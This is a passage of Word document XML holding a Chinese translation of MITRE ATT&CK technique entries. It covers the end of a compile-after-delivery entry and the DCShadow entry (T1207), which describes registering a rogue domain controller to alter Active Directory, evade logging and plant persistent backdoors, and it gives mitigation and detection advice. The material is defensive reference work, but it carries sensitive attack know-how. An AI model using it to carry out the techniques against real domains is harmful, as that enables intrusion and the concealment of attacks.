        <w:t>），然后再（重新）编译为具有捆绑编译器和执行框架的正确可执行二进制文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B50A2D5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F8399C0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AE2276" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="002F240D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F240D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>这种类型的攻击技术无法通过预防性控制轻松缓解，因为它基于系统功能的滥用</w:t>
      </w:r>
      <w:r w:rsidRPr="002F240D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316CB5D3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="004E160D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328838E5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>监控常见编译器（如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> csc.exe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> GCC/MinGW</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>）的执行文件路径和命令行参数，并与其他可疑行为关联，以减少正常用户和管理员行为的误报。有效负载的编译还可以生成文件创建和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>或文件写入事件。查找非本机二进制格式和跨平台编译器和执行框架（如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> Mono</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>），并确定它们在系统上是否有合法用途。通常，这些应仅在特定和有限的情况下使用，例如软件开发</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFB697B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>DCShadow</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="2F4994C8" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E0A67AD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00D12CC9" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00D12CC9">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00D12CC9">
              <w:t xml:space="preserve"> T1207</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70384970" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00D12CC9" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00D12CC9">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00D12CC9">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D12CC9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防御逃逸</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A66359D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00D12CC9" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00D12CC9">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00D12CC9">
              <w:t xml:space="preserve"> Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E239F79" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00D12CC9" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00D12CC9">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00D12CC9">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D12CC9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>管理员</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37A9E430" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00D12CC9" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00D12CC9">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00D12CC9">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D12CC9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>API</w:t>
            </w:r>
            <w:r w:rsidRPr="00D12CC9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>监控，认证日志，网络协议分析，网络抓包</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BA3C967" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00D12CC9" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>绕过的防御</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D12CC9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>日志分析</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25721E3B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00D12CC9" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00D12CC9">
              <w:t>贡献者</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D12CC9">
              <w:t>Vincent Le Toux</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25FE7E8C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00D12CC9">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00D12CC9">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="34DD80EB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665"/>
    <w:p w14:paraId="30A77D0E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve">DCShadow </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>是一种通过注册（或重用非活动注册）和模拟域控制器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>DC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>的行为来操作活动目录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>AD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>数据（包括对象和架构）的方法。注册后，恶意</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> DC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>可能能够将更改注入和复制到任何域对象的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> AD </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>基础结构中，包括凭据和密钥。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24755914" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00D12CC9" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="PMingLiU" w:hAnsi="Helvetica"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>注册恶意</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> DC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>涉及在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> AD </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>架构的配置分区中创建新服务器和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> nTDSDSA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>对象，这需要管理员权限（域或本地</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> DC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>）或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> KRBTGT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>哈希。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E729AF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>此技术可能会绕过系统日志记录和安全监视器，如安全信息和事件管理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>SIEM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>产品（因为对恶意</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> DC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>执行的操作可能不会报告给这些传感器）。该技术还可用于更改和删除复制和其他关联的元数据，以阻碍取证分析。对手还可以利用此技术执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00422098">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>SID-</w:t>
      </w:r>
      <w:r w:rsidRPr="00422098">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>历史注入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>或操作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> AD </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>对象（如帐户、访问控制列表、架构），以建立持久性的后门</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7336FB1C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4C4787" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B50B5B" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B50B5B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>这种类型的攻击技术无法通过预防性控制轻松缓解，因为它基于系统功能的滥用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C60BE50" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3671ECB6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00B50B5B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>监视和分析与</w:t>
      </w:r>
      <w:r w:rsidRPr="00B50B5B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>DC</w:t>
      </w:r>
      <w:r w:rsidRPr="00B50B5B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>之间以及非</w:t>
      </w:r>
      <w:r w:rsidRPr="00B50B5B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>DC</w:t>
      </w:r>
      <w:r w:rsidRPr="00B50B5B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>主机之间的数据复制（例如对</w:t>
      </w:r>
      <w:r w:rsidRPr="00B50B5B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>DrsAddEntry</w:t>
      </w:r>
      <w:r w:rsidRPr="00B50B5B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00B50B5B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>DrsReplicaAdd</w:t>
      </w:r>
      <w:r w:rsidRPr="00B50B5B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>，尤其是</w:t>
      </w:r>
      <w:r w:rsidRPr="00B50B5B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>GetNCChanges</w:t>
      </w:r>
      <w:r w:rsidRPr="00B50B5B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>的调用）相关的网络流量。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve">DC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>复制自然每</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> 15 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>分钟发生一次，但可以由攻击者或合法的紧急更改（例如：密码）触发。</w:t>
      </w:r>
      <w:r w:rsidRPr="00B50B5B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还要考虑监</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>控</w:t>
      </w:r>
      <w:r w:rsidRPr="00B50B5B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和警告</w:t>
      </w:r>
      <w:r w:rsidRPr="00B50B5B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AD</w:t>
      </w:r>
      <w:r w:rsidRPr="00B50B5B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象的复制（审核详细目录服务复制事件</w:t>
      </w:r>
      <w:r w:rsidRPr="00B50B5B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4928</w:t>
      </w:r>
      <w:r w:rsidRPr="00B50B5B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00B50B5B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4929</w:t>
      </w:r>
      <w:r w:rsidRPr="00B50B5B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B92E04D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00933429">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用</w:t>
      </w:r>
      <w:r w:rsidRPr="00933429">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AD</w:t>
      </w:r>
      <w:r w:rsidRPr="00933429">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录同步（</w:t>
      </w:r>
      <w:r w:rsidRPr="00933429">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DirSync</w:t>
      </w:r>
      <w:r w:rsidRPr="00933429">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）监</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>控</w:t>
      </w:r>
      <w:r w:rsidRPr="00933429">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00933429">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AD</w:t>
      </w:r>
      <w:r w:rsidRPr="00933429">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>复制</w:t>
      </w:r>
      <w:r w:rsidRPr="00933429">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00933429">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对目录状态的更改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB3D02C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665"/>
    <w:p w14:paraId="79461EE4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00933429">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基准并定期分析</w:t>
      </w:r>
      <w:r w:rsidRPr="00933429">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AD</w:t>
      </w:r>
      <w:r w:rsidRPr="00933429">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>架构的配置分区，并在创建</w:t>
      </w:r>
      <w:r w:rsidRPr="00933429">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nTDSDSA</w:t>
      </w:r>
